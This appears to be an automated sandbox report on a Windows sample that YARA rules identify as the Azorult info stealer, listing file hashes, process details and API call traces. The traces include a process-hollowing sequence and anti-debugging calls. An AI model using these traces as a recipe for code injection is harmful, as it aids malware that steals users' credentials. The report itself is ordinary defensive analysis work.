Yara matches:	Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Azorult_1, Description: Azorult Payload, Source: 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, Author: kevoreilly Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000003.2147061122.000000000077F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000003.2147061122.000000000077F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000000.00000003.2147061122.000000000077F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000003.2099553622.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000003.2099553622.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000000.00000003.2099553622.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000003.2146906626.000000000076E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000003.2146906626.000000000076E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000000.00000003.2146906626.000000000076E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000003.2099437786.000000000079B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000003.2099437786.000000000079B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000000.00000003.2099437786.000000000079B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000003.2099388481.000000000076B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000003.2099388481.000000000076B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000000.00000003.2099388481.000000000076B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000003.2099455436.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000003.2099455436.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000000.00000003.2099455436.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:22:08
Start date:	05/09/2024
Path:	C:\Users\user\Desktop\UoktqWamLR.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\UoktqWamLR.exe"
Imagebase:	0x400000
File size:	1'069'056 bytes
MD5 hash:	97CC0E7D7CAA3483E4C5E5CFF9FBE67E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Azorult_1, Description: Azorult Payload, Source: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: kevoreilly
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	31.3%
Dynamic/Decrypted Code Coverage:	10.3%
Signature Coverage:	7.4%
Total number of Nodes:	515
Total number of Limit Nodes:	66

Executed Functions

Function 023530DA Relevance: 26.6, APIs: 10, Strings: 5, Instructions: 374
nativethreadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 023532FF
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0235332C
CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 023534D7
NtGetContextThread.NTDLL(?,?), ref: 023534F6
NtReadVirtualMemory.NTDLL(?,?,?,000001D8,?), ref: 0235351C
NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 02353546
NtUnmapViewOfSection.NTDLL(?,?), ref: 02353561
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0235357A
NtSetContextThread.NTDLL(?,00010003), ref: 023535AB
NtResumeThread.NTDLL(?,00000000), ref: 023535B8

Strings

e, xrefs: 02353441
m.ex, xrefs: 0235343A
D, xrefs: 023534B2
egas, xrefs: 02353433
\Microsoft.NET\Framework\, xrefs: 02353448

Memory Dump Source

Source File: 00000000.00000002.2149983881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2350000_UoktqWamLR.jbxd

Similarity

API ID: Section$ThreadView$ContextCreateMemoryVirtual$ProcessReadResumeUnmapWrite
String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
API String ID: 1951729442-1087957892
Opcode ID: 5ce2e4d1293af8f240875ee12de4f5456ad381797f57e85e4d8835d97e82181f
Instruction ID: f08edaf7b82e2303f9a2ae712864f5f5f46ee6f0bf376469a97368e6c5e63b36
Opcode Fuzzy Hash: 5ce2e4d1293af8f240875ee12de4f5456ad381797f57e85e4d8835d97e82181f
Instruction Fuzzy Hash: EAE108B2D00269AFDF21DFA4CC84EEDBBB9BF04348F1444AAE918A7201D7349A55CF54

Function 02353113 Relevance: 26.6, APIs: 10, Strings: 5, Instructions: 369
nativethreadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 023532FF
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0235332C
CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 023534D7
NtGetContextThread.NTDLL(?,?), ref: 023534F6
NtReadVirtualMemory.NTDLL(?,?,?,000001D8,?), ref: 0235351C
NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 02353546
NtUnmapViewOfSection.NTDLL(?,?), ref: 02353561
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0235357A
NtSetContextThread.NTDLL(?,00010003), ref: 023535AB
NtResumeThread.NTDLL(?,00000000), ref: 023535B8

Strings

e, xrefs: 02353441
m.ex, xrefs: 0235343A
D, xrefs: 023534B2
egas, xrefs: 02353433
\Microsoft.NET\Framework\, xrefs: 02353448

Memory Dump Source

Source File: 00000000.00000002.2149983881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2350000_UoktqWamLR.jbxd

Similarity

API ID: Section$ThreadView$ContextCreateMemoryVirtual$ProcessReadResumeUnmapWrite
String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
API String ID: 1951729442-1087957892
Opcode ID: bdfd8c2c08da80d8aef1ac999a3557cfaab083761e6134d184dbc6d082490619
Instruction ID: 330050caef9c4bcb818cba74e3b8591f552ff90bf9d04cc354ec1296dba9b294
Opcode Fuzzy Hash: bdfd8c2c08da80d8aef1ac999a3557cfaab083761e6134d184dbc6d082490619
Instruction Fuzzy Hash: 37E1E6B2D00269AFDF21DFA4CC84EADBBB9FF04348F1444AAE918A7201D7349A55CF54

Function 004A7213 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 153
nativememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,00000100,00000000,00000100,00003000,00000040,?,NtQueryInformationProcess,004A5F77,?,NtQueryInformationProcess,004A5F91,?,NtQueryInformationProcess,004A5F60,NtQueryInformationProcess), ref: 004A72AA
NtProtectVirtualMemory.NTDLL(000000FF,?,00000005,00000040,?,?,NtQueryInformationProcess,004A5F77,?,NtQueryInformationProcess,004A5F91,?,NtQueryInformationProcess,004A5F60,NtQueryInformationProcess,004A6002), ref: 004A72D5
NtProtectVirtualMemory.NTDLL(000000FF,?,00000005,?,?,?,NtQueryInformationProcess,004A5F77,?,NtQueryInformationProcess,004A5F91,?,NtQueryInformationProcess,004A5F60,NtQueryInformationProcess,004A6002), ref: 004A73D1

Strings

NtQueryInformationProcess, xrefs: 004A7235, 004A724A, 004A7262, 004A727A

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: MemoryVirtual$Protect$Allocate
String ID: NtQueryInformationProcess
API String ID: 955180148-2781105232
Opcode ID: c9da44aaf622aab654dcea9c98dcb9c3ce760a812b9970c7e094a11117a3dd99
Instruction ID: 6a11cfcfe4cf1c89ad85895094628fad72207878ca06714cff9e9cca33d1e0fc
Opcode Fuzzy Hash: c9da44aaf622aab654dcea9c98dcb9c3ce760a812b9970c7e094a11117a3dd99
Instruction Fuzzy Hash: A2513871908206EFDB20CFA5CC54BAFFBB9EBA6310F10830BE51096190D3789645DB69

Function 004A73E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,00000022,?,?,?), ref: 004A7425

Strings

", xrefs: 004A73E3

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: InformationProcessQuery
String ID: "
API String ID: 1778838933-123907689
Opcode ID: 46563d9030cd06513c693f92c43473bf9d68ffdef123eb0d220882b6177cb01c
Instruction ID: 7bf2c959d80067fde81453dcf158a3cd871a1d2ab3cca21de9be32d587700041
Opcode Fuzzy Hash: 46563d9030cd06513c693f92c43473bf9d68ffdef123eb0d220882b6177cb01c
Instruction Fuzzy Hash: C1F0A77010620ADFDF22CF10DD10AAA3F61BF2E354F008426FB114A260C739C962EF6A

Function 004FC731 Relevance: 331.0, APIs: 220, Instructions: 964
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaStrCat.MSVBVM60(0040BCE8,0040BD30), ref: 004FC796
__vbaStrMove.MSVBVM60(0040BCE8,0040BD30), ref: 004FC7A0
__vbaStrCat.MSVBVM60(0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC7A7
__vbaStrMove.MSVBVM60(0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC7B1
__vbaStrCat.MSVBVM60(0040BFA4,00000000,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC7BC
__vbaStrMove.MSVBVM60(0040BFA4,00000000,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC7C6
__vbaStrCat.MSVBVM60(0040BC7C,00000000,0040BFA4,00000000,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC7D1
__vbaStrMove.MSVBVM60(0040BC7C,00000000,0040BFA4,00000000,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC7DB
__vbaStrCat.MSVBVM60(0040B8F4,00000000,0040BC7C,00000000,0040BFA4,00000000,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC7E7
__vbaStrMove.MSVBVM60(0040B8F4,00000000,0040BC7C,00000000,0040BFA4,00000000,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC7F1
__vbaStrCat.MSVBVM60(0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BFA4,00000000,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC7FD
__vbaStrMove.MSVBVM60(0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BFA4,00000000,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC807
#644.MSVBVM60(00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BFA4,00000000,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC80D
#644.MSVBVM60(00000000,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BFA4,00000000,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC816
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BFA4,00000000,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC827
__vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,?,?,?,00000000,00000000,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C), ref: 004FC846
__vbaStrCat.MSVBVM60(0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC86B
__vbaStrMove.MSVBVM60(0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC875
__vbaStrCat.MSVBVM60(0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC880
__vbaStrMove.MSVBVM60(0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC88A
__vbaStrCat.MSVBVM60(0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC895
__vbaStrMove.MSVBVM60(0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC89F
__vbaStrCat.MSVBVM60(0040B8F4,00000000,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC8A6
__vbaStrMove.MSVBVM60(0040B8F4,00000000,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC8B0
__vbaStrCat.MSVBVM60(0040B8FC,00000000,0040B8F4,00000000,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC8B7
__vbaStrMove.MSVBVM60(0040B8FC,00000000,0040B8F4,00000000,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC8C1
#644.MSVBVM60(00000000,0040B8FC,00000000,0040B8F4,00000000,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC8C7
#644.MSVBVM60(00000000,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC8D0
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000), ref: 004FC8E1
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?,?,00000000,00000000,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BFB4,00000000), ref: 004FC8FC
__vbaStrCat.MSVBVM60(0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC921
__vbaStrMove.MSVBVM60(0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC92B
__vbaStrCat.MSVBVM60(0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC936
__vbaStrMove.MSVBVM60(0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC940
__vbaStrCat.MSVBVM60(0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC94B
__vbaStrMove.MSVBVM60(0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000,0040BCE8,0040BD30), ref: 004FC955
__vbaStrCat.MSVBVM60(0040B8F4,00000000,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000), ref: 004FC95C
__vbaStrMove.MSVBVM60(0040B8F4,00000000,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000), ref: 004FC966
__vbaStrCat.MSVBVM60(0040B8FC,00000000,0040B8F4,00000000,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC), ref: 004FC96D
__vbaStrMove.MSVBVM60(0040B8FC,00000000,0040B8F4,00000000,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC), ref: 004FC977
#644.MSVBVM60(00000000,0040B8FC,00000000,0040B8F4,00000000,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C), ref: 004FC97D
#644.MSVBVM60(00000000,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000), ref: 004FC986
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000), ref: 004FC997
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?,?,00000000,00000000,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BFB4,00000000), ref: 004FC9B2
__vbaStrCat.MSVBVM60(0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000), ref: 004FC9D7
__vbaStrMove.MSVBVM60(0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC,0040BCE8,00000000), ref: 004FC9E1
__vbaStrCat.MSVBVM60(0040BFC4,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC), ref: 004FC9EC
__vbaStrMove.MSVBVM60(0040BFC4,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C,0040BFAC), ref: 004FC9F6
#644.MSVBVM60(00000000,0040BFC4,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C), ref: 004FC9FC
#644.MSVBVM60(00000000,00000000,0040BFC4,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000), ref: 004FCA05
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000,0040BFC4,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000), ref: 004FCA16
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,00000000,00000000,0040BFC4,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0), ref: 004FCA25
__vbaStrCat.MSVBVM60(0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C), ref: 004FCA4A
__vbaStrMove.MSVBVM60(0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74,00000000,0040BE6C), ref: 004FCA54
__vbaStrCat.MSVBVM60(0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74), ref: 004FCA5F
__vbaStrMove.MSVBVM60(0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4,00000000,0040BE74), ref: 004FCA69
__vbaStrCat.MSVBVM60(0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4), ref: 004FCA74
__vbaStrMove.MSVBVM60(0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0,0040BFAC,0040BFB4), ref: 004FCA7E
__vbaStrCat.MSVBVM60(0040BC7C,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0), ref: 004FCA89
__vbaStrMove.MSVBVM60(0040BC7C,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000,0040BCF0), ref: 004FCA93
__vbaStrCat.MSVBVM60(0040B8F4,00000000,0040BC7C,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8), ref: 004FCA9A
__vbaStrMove.MSVBVM60(0040B8F4,00000000,0040BC7C,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8), ref: 004FCAA4
__vbaStrCat.MSVBVM60(0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4), ref: 004FCAAB
__vbaStrMove.MSVBVM60(0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4), ref: 004FCAB5
#644.MSVBVM60(00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC), ref: 004FCABB
#644.MSVBVM60(00000000,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C), ref: 004FCAC4
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC), ref: 004FCAD5
__vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,?,?,?,00000000,00000000,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C), ref: 004FCAF4
__vbaStrCat.MSVBVM60(0040BD08,0040BFCC,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000), ref: 004FCB19
__vbaStrMove.MSVBVM60(0040BD08,0040BFCC,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4,00000000,0040BCF8,00000000), ref: 004FCB23
__vbaStrCat.MSVBVM60(0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4,00000000), ref: 004FCB2E
__vbaStrMove.MSVBVM60(0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC,0040BFB4,00000000), ref: 004FCB38
__vbaStrCat.MSVBVM60(0040BC7C,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC), ref: 004FCB43
__vbaStrMove.MSVBVM60(0040BC7C,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BC7C,0040BFBC), ref: 004FCB4D
__vbaStrCat.MSVBVM60(0040B8F4,00000000,0040BC7C,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000), ref: 004FCB54
__vbaStrMove.MSVBVM60(0040B8F4,00000000,0040BC7C,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000), ref: 004FCB5E
__vbaStrCat.MSVBVM60(0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08), ref: 004FCB65
__vbaStrMove.MSVBVM60(0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BFB4,00000000,0040BCE0,00000000,0040BD08), ref: 004FCB6F
__vbaStrCat.MSVBVM60(0040BFD4,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040BCE0,00000000,0040BD08,0040BFCC,00000000,0040BFB4,00000000,0040BCE0), ref: 004FCB7A
